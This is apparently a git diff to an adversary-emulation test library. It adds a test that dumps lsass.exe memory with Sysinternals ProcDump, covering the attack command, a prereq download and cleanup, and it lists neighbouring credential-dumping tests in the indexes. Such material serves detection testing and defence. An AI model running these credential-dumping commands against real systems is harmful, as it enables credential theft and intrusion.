diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index cab460c0..24db6df3 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -215,6 +215,7 @@ credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows T
credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
+credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2efff797..f3318313 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -23,6 +23,7 @@ credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows T
credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
+credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index afc3f27c..3f8b1a3d 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -437,6 +437,7 @@
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
+ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index c55feaa0..d0355b01 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -47,6 +47,7 @@
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
+ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 568771e0..ec115ee4 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -20519,6 +20519,47 @@ credential-access:
'
name: powershell
elevation_required: true
+ - name: Create Mini Dump of LSASS.exe using ProcDump
+ auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+ ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
+
+ Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
+
+ If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass_dump.dmp
+ procdump_exe:
+ description: Path of Procdump executable
+ type: Path
+ default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'ProcDump tool from Sysinternals must exist on disk at specified
+ location (#{procdump_exe})
+
+'
+ prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
+ Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
+ New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
+ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
+ executor:
+ command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n"
+ cleanup_command: 'del "#{output_file}" >nul 2> nul
+
+'
+ name: command_prompt
+ elevation_required: true
T1557:
technique:
external_references:
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index 12664f66..e90f33b9 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -42,6 +42,8 @@ The following SSPs can be used to access credentials:
- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
+- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
+
@@ -418,4 +420,58 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
+
+
+
+## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
+
+Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
+
+If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp|
+| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
+```
+
+#### Cleanup Commands:
+```cmd
+del "#{output_file}" >nul 2> nul
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
+Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
+New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
+Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
+```
+
+
+
+